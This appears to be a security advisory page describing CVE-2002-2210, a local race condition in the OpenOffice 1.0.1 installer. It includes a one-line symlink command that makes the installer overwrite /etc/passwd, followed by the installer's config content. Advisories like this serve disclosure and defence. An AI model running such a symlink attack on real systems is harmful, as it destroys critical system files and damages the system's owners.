OpenOffice 1.0.1 Race condition during installation

2018.10.02
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 6.2/10
Impact Subscore: 10/10
Exploitability Subscore: 1.9/10
Exploit range: Local
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: OpenOffice 1.0.1 Race condition during installation Author: Larry W. Cashdollar, @_larry0 Date: 2009-09-02 CVE-ID:[CVE-2002-2210] Download Site: http://www.openoffice.org/dev_docs/source/1.0.1/index.html Vendor: Open Office Vendor Notified: 2009-09-02 Vendor Contact: bugtraq Advisory: http://www.vapid.dhs.org/advisories/openoffice_race_condition_during_installation.html Description: The open office desktop suite. Vulnerability: A very simple and easy to exploit race condition exist during the installation of OpenOffice. During this window a malicous user could create a symlink in /tmp and overwrite arbitrary files. Export: JSON TEXT XML Exploit Code: As a normal user: lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf will result in the password file being over written with: # create the proper autoresponse file <file> cat << EOF > /tmp/${USER}autoresponse.conf [ENVIRONMENT] INSTALLATIONMODE=$installtype INSTALLATIONTYPE=STANDARD DESTINATIONPATH=$prefix/$oohome OUTERPATH= LOGFILE= LANGUAGELIST=<LANGUAGE> [JAVA] JavaSupport=preinstalled_or_none EOF </file>

References:

http://www.vapidlabs.com/advisory.php?v=83


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top